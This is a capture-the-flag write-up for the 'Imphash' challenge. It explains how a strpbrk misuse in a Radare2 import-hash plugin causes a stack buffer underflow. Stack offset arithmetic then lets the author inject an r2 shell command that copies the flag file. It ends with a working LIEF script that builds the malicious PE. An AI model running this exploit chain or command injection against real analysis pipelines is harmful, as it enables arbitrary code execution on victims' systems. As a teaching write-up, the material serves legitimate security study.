Skip to content

Imphash

This challenge involves a Radare2 (r2) plugin that calculates the import hash (imphash) of a Windows Portal Executable (PE) file.

A logic error in the validation of the library name results in a buffer underflow when it is less than 4 bytes long.

Challenge information

Almost there agent, we might have a chance to gain access into the enemy’s systems again!! We are so close.

But, it seems like they’ve developed a robust anti-malware service that’s thwarting all attempts to breach their systems!

We’ve found this import hashing plugin which is a key component of their malware analysis pipeline. Agent, can you find a way around it?

Challenge files

nc chals.junron.dev 1337
Challenge writeup

Overview

First, the iIj r2 command is executed to gather information about the input executable file. The plugin aborts immediately if the file is not a PE file:

c
v23 = r_core_cmd_str(v24, "iIj");
v22 = cJSON_Parse(v23);
bintype = cJSON_GetObjectItemCaseSensitive(v22, "bintype");
if ( !strncmp(bintype->valuestring, "pe", 2uLL) ){
  // continue 
} else {
    puts("File is not PE file!");
    return 1LL;
}

Once we have validated that the input is a real PE file, we can move on to actually calculating the imphash.

  1. For each import, retrieve the library name (eg kernel32.dll) and function name (eg CreateProcessA)

    a. Remove the .dll, .sys or .ocx from the library name

    b. Convert everything to lowercase

    c. Join the library name and function name with a .

  2. Join all the results with ,

  3. Return the MD5 hash of the result

Step 1 and 2 of the above process is implemented as follows:

c
libname = v23->valuestring;
name = v22->valuestring;
v19 = strpbrk(libname, ".dll");
if ( !v19 || v19 == libname )
{
  v18 = strpbrk(libname, ".ocx");
  if ( !v18 || v18 == libname )
  {
    v17 = strpbrk(libname, ".sys");
    if ( !v17 || v17 == libname )
    {
      puts("Invalid library name! Must end in .dll, .ocx or .sys!");
      return 1LL;
    }
  }
}
libname_len = strlen(libname) - 4;
name_len = strlen(name);
if ( 4094LL - ptr < (unsigned __int64)(libname_len + name_len) )
{
  puts("Imports too long!");
  return 1LL;
}
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
ptr += libname_len;
tmp_buf[ptr++] = '.';
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);
ptr += name_len;
tmp_buf[ptr++] = ',';

First, the plugin checks that the library name contains either .dll, .ocx and .sys and it doesn't occur at the start of the string . If it does, the length of the library name is reduced by 4 to remove the file extension.

However, anyone experienced in C programming would quickly realize that the strpbrk function doesn't actually check if the string passed as the second argument is actually a substring of the first argument. Instead, it returns the first address of any character in the second string that occurs in the first string. Therefore, the string "a." would pass the check as it contains a character within ".dll".

This causes libname_len to be set to -2, resulting in a buffer underflow in the following code:

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
ptr += libname_len;
tmp_buf[ptr++] = '.';

You might have noticed an additional vulnerability in the length check 4094LL - ptr < (unsigned __int64)(libname_len + name_len). When writing this challenge, I thought it would not be exploitable, as none of the variables located after tmp_buf in the stack were interesting. However, some participants (1 and 2) were able to exploit this by overwriting the name_len variable.

Exploitation

Since the challenge is completely non-interactive, we will need to execute a 'one-shot' attack with no leaks. Therefore, the only available target is out_buf:

c
strcpy(out_buf, "echo ");
strcpy(&out_buf[37], " > out");

// Fill up tmp_buf

MD5_Init(md5);
v8 = strlen(tmp_buf);
MD5_Update(md5, tmp_buf, v8 - 1);
MD5_Final(md5_hash, md5);
hex_alphabet = "0123456789abcdef";
for ( idx = 0; idx <= 15; ++idx )
{
  out_buf[2 * idx + 5] = hex_alphabet[(md5_hash[idx] >> 4) & 0xF];
  out_buf[2 * idx + 6] = hex_alphabet[md5_hash[idx] & 0xF];
}
v9 = (void *)r_core_cmd_str(v30, out_buf);

The intended purpose of out_buf is to store the r2 command that will be used to write the imphash to the out file. However, r2 also includes the ability to execute system commands, prefixed by !. Therefore, if we can control the out_buf buffer, we can inject arbitrary commands that will be executed.

The relevant stack layout is shown below:

c
char out_buf[256]; // [rsp+80h] [rbp-11A0h] BYREF
__int16 ptr; // [rsp+180h] [rbp-10A0h]
char tmp_buf[4096]; // [rsp+182h] [rbp-109Eh] BYREF

strcpy(out_buf, "echo ");
strcpy(&out_buf[37], " > out");

Note that there are 0x102 bytes between the tmp_buf and out_buf. However, the ideal location to inject our payload would be to overwrite out, so that it will not be overwritten by the MD5 imphash, while maintaining the existing command structure. This would correspond to a ptr value of -218.

Next, let's observe how the buffer underflow will affect the stack variables:

c
ptr += libname_len; // libname_len = -2, ptr = -2
tmp_buf[ptr++] = '.'; // ptr = -209

First, ptr is set to -2. In 16-bit 2's complement, this is 0xfffe or 0xfe 0xff in little-endian.

Next, tmp_buf[-2] is set to . (hex 0x2e). Note that this modifies the lower byte of ptr, so that it now has the value 0xff2e, or -210. This value is then incremented (ptr++) to -209. This is a little more than the -218 we want. Thus, we will have to overwrite the ptr a second time. We will set the function name to a string with 206 characters. This will move ptr up to -2, including the ptr++ to append the ,.

c
tmp_buf[ptr++] = '.'; // ptr = -209
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);
ptr += name_len; // ptr = -3
tmp_buf[ptr++] = ','; // ptr = -2

For the second import, we will keep the libname the same, while specifying A$ as the function name.

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
// libname_len = -2
ptr += libname_len; // ptr = -4
tmp_buf[ptr++] = '.'; // ptr = -3
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]); // In the second iteration, ptr = -220
ptr += name_len; // ptr = -218
tmp_buf[ptr++] = ','; // ptr = -217

This lines up the lower byte of ptr to be overwritten by $. This causes ptr to be 0xff24, or -220. After adding the name_len and ,, ptr is -217.

In the third import, we will finally write the payload. We will keep the libname the same, while specifying a;!cp /app/flag.txt out; as the function name.

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
// libname_len = -2
ptr += libname_len; // ptr = -219
tmp_buf[ptr++] = '.'; // ptr = -218
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);

After subtracting 2 and adding 1 for ., ptr is finally lined up at -218, just as we begin to write the function name. In the end, the command executed will be:

echo 76df02635dd147d8d5aa7a233e4117e5 >.a;!cp /app/flag.txt out;

This solution is probably a little overcomplicated, and other solutions are possible.

Challenge solution script
python
from lief import PE

binary32 = PE.parse("./clear.exe")

binary32.remove_all_libraries()

a = binary32.add_library("a.")
a.add_entry("A"*206)
a.add_entry("A$")
a.add_entry("a;!cp /app/flag.txt out;")

builder = PE.Builder(binary32)
builder.build_imports(True)
builder.build()
builder.write("solve.exe")